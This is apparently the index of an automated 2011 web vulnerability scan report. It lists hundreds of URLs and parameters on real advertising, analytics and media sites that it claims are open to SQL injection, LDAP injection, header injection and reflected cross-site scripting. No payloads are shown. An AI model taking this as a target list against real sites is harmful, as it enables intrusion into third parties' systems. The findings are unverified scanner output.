XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-03

Report generated by XSS.CX at Sat Sep 17 17:46:05 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/DY146/ron_lifestyle [sz parameter]

1.2. http://ad.doubleclick.net/adj/hdm.quicksimple/other/ [id cookie]

1.3. http://api.uproxx.com/ulink/feed [c_cats parameter]

1.4. http://hfm.checkm8.com/adam/detect [&LOC parameter]

1.5. http://hfm.checkm8.com/adam/detect [HEIGHT parameter]

1.6. http://hfm.checkm8.com/adam/detect [WIDTH parameter]

1.7. http://hfm.checkm8.com/adam/detect [dt cookie]

1.8. http://hfm.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

1.9. http://hfm.checkm8.com/adam/detect [req parameter]

1.10. http://hfm.checkm8.com/adam/detected [DATE parameter]

1.11. http://hfm.checkm8.com/adam/detected [FL parameter]

1.12. http://hfm.checkm8.com/adam/detected [RES parameter]

1.13. http://hfm.checkm8.com/adam/detected [Referer HTTP header]

1.14. http://hfm.checkm8.com/adam/detected [WIDTH parameter]

1.15. http://hfm.checkm8.com/adam/detected [cm8dccp cookie]

1.16. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 1]

1.17. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 4]

1.18. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s92442379223648 [REST URL parameter 1]

1.19. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s94189070519059 [REST URL parameter 1]

1.20. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s98951816044282 [REST URL parameter 3]

1.21. http://syn.verticalacuity.com/varw/getPromo [Referer HTTP header]

1.22. http://www.answerology.com/ [name of an arbitrarily supplied request parameter]

1.23. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js [REST URL parameter 1]

1.24. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 1]

1.25. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 3]

1.26. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js [REST URL parameter 3]

1.27. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js [REST URL parameter 2]

1.28. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js [REST URL parameter 2]

1.29. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 2]

1.30. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 3]

1.31. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js [REST URL parameter 1]

1.32. http://www.answerology.com/cssjs/CharacterCounter.js [REST URL parameter 1]

1.33. http://www.answerology.com/cssjs/CoachesLayout.js [REST URL parameter 2]

1.34. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 1]

1.35. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 2]

1.36. http://www.answerology.com/index.aspx [REST URL parameter 1]

1.37. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg [REST URL parameter 2]

1.38. http://www.networkadvertising.org/managing/opt_out.asp [__utmz cookie]

1.39. http://www.networkadvertising.org/managing/opt_out.asp [name of an arbitrarily supplied request parameter]

1.40. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759 [REST URL parameter 1]

2. LDAP injection

2.1. http://ce.lijit.com/merge [REST URL parameter 1]

2.2. http://pixel.quantserve.com/optout_set [nocache parameter]

2.3. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]

3. HTTP header injection

3.1. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie]

3.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]

3.3. http://optout.crwdcntrl.net/optout [ct parameter]

3.4. http://optout.crwdcntrl.net/optout [d parameter]

3.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2]

4.2. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3]

4.3. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [name of an arbitrarily supplied request parameter]

4.4. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter]

4.5. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]

4.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]

4.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [name of an arbitrarily supplied request parameter]

4.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter]

4.9. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]

4.10. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]

4.11. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [name of an arbitrarily supplied request parameter]

4.12. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter]

4.13. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]

4.14. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]

4.15. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [name of an arbitrarily supplied request parameter]

4.16. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter]

4.17. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1]

4.18. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2]

4.19. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3]

4.20. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter]

4.21. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 1]

4.22. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]

4.23. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]

4.24. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter]

4.25. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1]

4.26. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]

4.27. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]

4.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter]

4.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1]

4.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]

4.31. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]

4.32. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter]

4.33. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]

4.34. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]

4.35. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]

4.36. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]

4.37. http://adnxs.revsci.net/imp [Z parameter]

4.38. http://adnxs.revsci.net/imp [s parameter]

4.39. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

4.40. http://adsfac.us/ag.asp [cc parameter]

4.41. http://adsfac.us/ag.asp [clk parameter]

4.42. http://adsfac.us/ag.asp [clk parameter]

4.43. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]

4.44. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]

4.45. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]

4.46. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]

4.47. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]

4.48. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]

4.49. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]

4.50. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]

4.51. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]

4.52. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]

4.53. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]

4.54. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]

4.55. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]

4.56. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]

4.57. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]

4.58. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]

4.59. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]

4.60. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]

4.61. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]

4.62. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]

4.63. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]

4.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]

4.65. http://advertising.aol.com/nai/nai.php [action_id parameter]

4.66. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]

4.67. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]

4.68. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]

4.69. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]

4.70. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]

4.71. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]

4.72. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]

4.73. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]

4.74. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]

4.75. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]

4.76. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]

4.77. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]

4.78. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]

4.79. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]

4.80. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]

4.81. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]

4.82. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]

4.83. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]

4.84. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]

4.85. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]

4.86. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]

4.87. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]

4.88. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]

4.89. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]

4.90. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]

4.91. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]

4.92. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]

4.93. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]

4.94. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]

4.95. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]

4.96. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]

4.97. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]

4.98. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]

4.99. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]

4.100. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]

4.101. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]

4.102. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]

4.103. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]

4.104. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]

4.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]

4.106. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]

4.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]

4.108. http://api.uproxx.com/ulink/feed [pid parameter]

4.109. http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter]

4.110. http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter]

4.111. http://api.zap2it.com/tvlistings/zcConnector.jsp [name of an arbitrarily supplied request parameter]

4.112. http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter]

4.113. http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter]

4.114. http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter]

4.115. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.116. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.117. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.118. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.119. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.120. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.121. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.122. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.123. http://c.aol.com/read/_topic_stats [callback parameter]

4.124. http://choices.truste.com/ca [c parameter]

4.125. http://choices.truste.com/ca [cid parameter]

4.126. http://choices.truste.com/ca [plc parameter]

4.127. http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter]

4.128. http://ellegirl.elle.com/ [name of an arbitrarily supplied request parameter]

4.129. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 1]

4.130. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 2]

4.131. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 3]

4.132. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 4]

4.133. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 5]

4.134. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 1]

4.135. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 2]

4.136. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 3]

4.137. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 4]

4.138. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 5]

4.139. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 1]

4.140. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 2]

4.141. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 3]

4.142. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 4]

4.143. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 5]

4.144. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [background parameter]

4.145. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [border parameter]

4.146. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [height parameter]

4.147. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [infobackground parameter]

4.148. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [infocolor parameter]

4.149. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 1]

4.150. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 2]

4.151. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 3]

4.152. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 4]

4.153. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 5]

4.154. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 1]

4.155. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 2]

4.156. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 3]

4.157. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 4]

4.158. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 1]

4.159. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 2]

4.160. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 3]

4.161. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 4]

4.162. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 5]

4.163. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 1]

4.164. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 2]

4.165. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 3]

4.166. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 4]

4.167. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 5]

4.168. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 6]

4.169. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 1]

4.170. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 2]

4.171. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 3]

4.172. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 4]

4.173. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 5]

4.174. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 6]

4.175. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 1]

4.176. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 2]

4.177. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 3]

4.178. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 4]

4.179. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 5]

4.180. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 6]

4.181. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 1]

4.182. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 2]

4.183. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 3]

4.184. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 4]

4.185. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 5]

4.186. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 1]

4.187. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 2]

4.188. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 3]

4.189. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 4]

4.190. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

4.191. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

4.192. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

4.193. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

4.194. http://event.adxpose.com/event.flow [uid parameter]

4.195. http://events.seattlepi.com/partner_json/search [image_size parameter]

4.196. http://events.seattlepi.com/partner_json/search [jsonsp parameter]

4.197. http://events.seattlepi.com/partner_json/search [st parameter]

4.198. http://events.stamfordadvocate.com/partner_json/search [image_size parameter]

4.199. http://events.stamfordadvocate.com/partner_json/search [jsonsp parameter]

4.200. http://events.stamfordadvocate.com/partner_json/search [st parameter]

4.201. http://js.revsci.net/gateway/gw.js [csid parameter]

4.202. http://mpd.mxptint.net/1/S74.API/G1/T124/js [mid parameter]

4.203. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]

4.204. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]

4.205. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]

4.206. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]

4.207. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]

4.208. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]

4.209. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]

4.210. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]

4.211. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]

4.212. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]

4.213. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]

4.214. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]

4.215. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]

4.216. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]

4.217. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]

4.218. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]

4.219. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]

4.220. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]

4.221. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]

4.222. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]

4.223. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]

4.224. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]

4.225. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]

4.226. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]

4.227. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]

4.228. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]

4.229. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]

4.230. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]

4.231. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]

4.232. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]

4.233. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]

4.234. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]

4.235. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]

4.236. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]

4.237. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]

4.238. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]

4.239. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]

4.240. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]

4.241. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]

4.242. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]

4.243. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]

4.244. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]

4.245. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]

4.246. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]

4.247. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]

4.248. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]

4.249. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]

4.250. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]

4.251. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]

4.252. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]

4.253. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]

4.254. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]

4.255. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]

4.256. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]

4.257. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]

4.258. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]

4.259. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]

4.260. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]

4.261. http://nai.glb.adtechus.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]

4.262. http://nai.glb.adtechus.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]

4.263. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]

4.264. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]

4.265. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

4.266. http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

4.267. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]

4.268. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]

4.269. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

4.270. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

4.271. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]

4.272. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]

4.273. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]

4.274. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]

4.275. http://nai.glb.adtechus.com/sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css [REST URL parameter 1]

4.276. http://nai.glb.adtechus.com/sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css [REST URL parameter 1]

4.277. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]

4.278. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]

4.279. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]

4.280. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]

4.281. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]

4.282. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]

4.283. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]

4.284. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]

4.285. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]

4.286. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]

4.287. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]

4.288. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]

4.289. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]

4.290. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]

4.291. http://pixel.adsafeprotected.com/jspix [anId parameter]

4.292. http://pixel.adsafeprotected.com/jspix [campId parameter]

4.293. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

4.294. http://pixel.adsafeprotected.com/jspix [pubId parameter]

